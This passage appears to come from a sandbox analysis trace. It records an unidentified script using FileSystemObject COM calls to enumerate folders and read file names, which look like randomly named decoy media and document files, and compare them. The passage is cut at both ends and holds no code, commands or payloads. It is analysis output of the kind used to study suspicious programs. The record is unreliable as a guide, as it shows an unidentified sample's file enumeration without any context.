pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1 [0133.402] FileSystemObject:IUnknown:Release (This=0x84a1fc8) returned 0x0 [0133.402] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x84a35f4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ac0*="Files", cNames=0x1, lcid=0x409, rgDispId=0x1a7ac4 | out: rgDispId=0x1a7ac4*=10002) returned 0x0 [0133.402] FileSystemObject:IDispatch:Invoke (in: This=0x84a35f4, dispIdMember=10002, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7a98*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7af4, pExcepInfo=0x1a7a78, puArgErr=0x1a7aa8 | out: pDispParams=0x1a7a98*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7af4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x84a1fd8, varVal2=0x0), pExcepInfo=0x1a7a78*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7aa8*=0x0) returned 0x0 [0133.402] FileSystemObject:IUnknown:AddRef (This=0x84a1fd8) returned 0x2 [0133.402] FileSystemObject:IUnknown:Release (This=0x84a1fd8) returned 0x1 [0133.402] FileSystemObject:IDispatch:Invoke (in: This=0x84a1fd8, dispIdMember=-4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7a50*(rgvarg=0x0, rgdispidNamedArgs=0x6e8aca5, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7a60, pExcepInfo=0x1a7a30, puArgErr=0x1a7a70 | out: pDispParams=0x1a7a50*(rgvarg=0x0, rgdispidNamedArgs=0x6e8aca5, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7a60*(varType=0xd, wReserved1=0x6534, wReserved2=0x20b2, wReserved3=0x6534, varVal1=0x84a2008, varVal2=0x0), pExcepInfo=0x1a7a30*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7a70*=0x84a1fc8) returned 0x0 [0133.402] FileSystemObject:IUnknown:QueryInterface (in: This=0x84a2008, riid=0x6662da88*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a7ae4 | out: ppvObject=0x1a7ae4*=0x84a2008) returned 0x0 [0133.402] FileSystemObject:IUnknown:Release (This=0x84a2008) returned 0x1 [0133.402] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a2008, celt=0x1, rgvar=0x1a7aa8*(varType=0x0, wReserved1=0x0, wReserved2=0x7ba0, wReserved3=0x1a, varVal1=0x664b3e08, varVal2=0x84a1fd8), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1 [0133.402] FileSystemObject:IUnknown:Release (This=0x84a2008) returned 0x0 [0133.403] FileSystemObject:IUnknown:Release (This=0x84a1ff8) returned 0x0 [0133.403] FileSystemObject:IUnknown:Release (This=0x84a1fd8) returned 0x0 [0133.403] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fa8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0xad14, wReserved3=0x6e8, varVal1=0x1a7c5c, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.403] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x84faaec, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ac0*="SubFolders", cNames=0x1, lcid=0x409, rgDispId=0x1a7ac4 | out: rgDispId=0x1a7ac4*=10001) returned 0x0 [0133.403] FileSystemObject:IDispatch:Invoke (in: This=0x84faaec, dispIdMember=10001, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7a98*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7af4, pExcepInfo=0x1a7a78, puArgErr=0x1a7aa8 | out: pDispParams=0x1a7a98*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7af4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x84a1fd8, varVal2=0x0), pExcepInfo=0x1a7a78*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7aa8*=0x0) returned 0x0 [0133.403] FileSystemObject:IUnknown:AddRef (This=0x84a1fd8) returned 0x2 [0133.403] FileSystemObject:IUnknown:Release (This=0x84a1fd8) returned 0x1 [0133.403] FileSystemObject:IDispatch:Invoke (in: This=0x84a1fd8, dispIdMember=-4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7a50*(rgvarg=0x0, rgdispidNamedArgs=0x6e8ac74, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7a60, pExcepInfo=0x1a7a30, puArgErr=0x1a7a70 | out: pDispParams=0x1a7a50*(rgvarg=0x0, rgdispidNamedArgs=0x6e8ac74, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7a60*(varType=0xd, wReserved1=0x6534, wReserved2=0x20b2, wReserved3=0x6534, varVal1=0x84a1fe8, varVal2=0x0), pExcepInfo=0x1a7a30*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7a70*=0x84a1fc8) returned 0x0 [0133.403] FileSystemObject:IUnknown:QueryInterface (in: This=0x84a1fe8, riid=0x6662da88*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a7aec | out: ppvObject=0x1a7aec*=0x84a1fe8) returned 0x0 [0133.404] FileSystemObject:IUnknown:Release (This=0x84a1fe8) returned 0x1 [0133.404] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7aa8*(varType=0x0, wReserved1=0x0, wReserved2=0x7ba0, wReserved3=0x1a, varVal1=0x664b3e08, varVal2=0x84a1fd8), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1 [0133.404] FileSystemObject:IUnknown:Release (This=0x84a1fe8) returned 0x0 [0133.404] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x84faaec, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ac0*="Files", cNames=0x1, lcid=0x409, rgDispId=0x1a7ac4 | out: rgDispId=0x1a7ac4*=10002) returned 0x0 [0133.404] FileSystemObject:IDispatch:Invoke (in: This=0x84faaec, dispIdMember=10002, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7a98*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7af4, pExcepInfo=0x1a7a78, puArgErr=0x1a7aa8 | out: pDispParams=0x1a7a98*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7af4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x84a1ff8, varVal2=0x0), pExcepInfo=0x1a7a78*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7aa8*=0x0) returned 0x0 [0133.404] FileSystemObject:IUnknown:AddRef (This=0x84a1ff8) returned 0x2 [0133.404] FileSystemObject:IUnknown:Release (This=0x84a1ff8) returned 0x1 [0133.404] FileSystemObject:IDispatch:Invoke (in: This=0x84a1ff8, dispIdMember=-4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7a50*(rgvarg=0x0, rgdispidNamedArgs=0x6e8aca5, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7a60, pExcepInfo=0x1a7a30, puArgErr=0x1a7a70 | out: pDispParams=0x1a7a50*(rgvarg=0x0, rgdispidNamedArgs=0x6e8aca5, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7a60*(varType=0xd, wReserved1=0x6534, wReserved2=0x20b2, wReserved3=0x6534, varVal1=0x84a2008, varVal2=0x0), pExcepInfo=0x1a7a30*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7a70*=0x84a1fe8) returned 0x0 [0133.404] FileSystemObject:IUnknown:QueryInterface (in: This=0x84a2008, riid=0x6662da88*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a7ae4 | out: ppvObject=0x1a7ae4*=0x84a2008) returned 0x0 [0133.404] FileSystemObject:IUnknown:Release (This=0x84a2008) returned 0x1 [0133.404] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a2008, celt=0x1, rgvar=0x1a7aa8*(varType=0x0, wReserved1=0x0, wReserved2=0x7ba0, wReserved3=0x1a, varVal1=0x664b3e08, varVal2=0x84a1ff8), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1 [0133.405] FileSystemObject:IUnknown:Release (This=0x84a2008) returned 0x0 [0133.405] FileSystemObject:IUnknown:Release (This=0x84a1fd8) returned 0x0 [0133.405] FileSystemObject:IUnknown:Release (This=0x84a1ff8) returned 0x0 [0133.405] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fa8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0xad14, wReserved3=0x6e8, varVal1=0x1a7c5c, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1 [0133.405] FileSystemObject:IUnknown:Release (This=0x84a1fa8) returned 0x0 [0133.405] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3243974, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Files", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=10002) returned 0x0 [0133.405] FileSystemObject:IDispatch:Invoke (in: This=0x3243974, dispIdMember=10002, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7bd8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7bd8*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x84a1fb8, varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.405] FileSystemObject:IUnknown:AddRef (This=0x84a1fb8) returned 0x2 [0133.405] FileSystemObject:IUnknown:Release (This=0x84a1fb8) returned 0x1 [0133.405] FileSystemObject:IDispatch:Invoke (in: This=0x84a1fb8, dispIdMember=-4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b34*(rgvarg=0x0, rgdispidNamedArgs=0x6e8aca5, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7b44, pExcepInfo=0x1a7b14, puArgErr=0x1a7b54 | out: pDispParams=0x1a7b34*(rgvarg=0x0, rgdispidNamedArgs=0x6e8aca5, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7b44*(varType=0xd, wReserved1=0x6534, wReserved2=0x20b2, wReserved3=0x6534, varVal1=0x84a1fe8, varVal2=0x0), pExcepInfo=0x1a7b14*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b54*=0x84a1fa8) returned 0x0 [0133.405] FileSystemObject:IUnknown:QueryInterface (in: This=0x84a1fe8, riid=0x6662da88*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a7bc8 | out: ppvObject=0x1a7bc8*=0x84a1fe8) returned 0x0 [0133.405] FileSystemObject:IUnknown:Release (This=0x84a1fe8) returned 0x1 [0133.405] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b8c*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x664b3e08, varVal2=0x84a1fb8), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.405] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.406] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0qaoWhiw9jsnQ pj9x5X.mp3", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.406] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.406] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.406] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.406] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="19Ny.wav", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.407] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.407] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6beb43c), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.407] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.407] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="41-UY5InlYE I1QwSW-.pdf", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.407] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.407] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.407] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.407] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="68TD72sZCNSrIMzgrIa.swf", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.408] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.408] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.408] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.408] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BDc_JvZ.ods", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.408] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.408] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6beb43c), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.408] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.408] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bxaaV29c7c.gif", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.409] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.409] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6bbb6c4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.409] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.409] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Cyzw6X_.bmp", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.409] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.410] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, 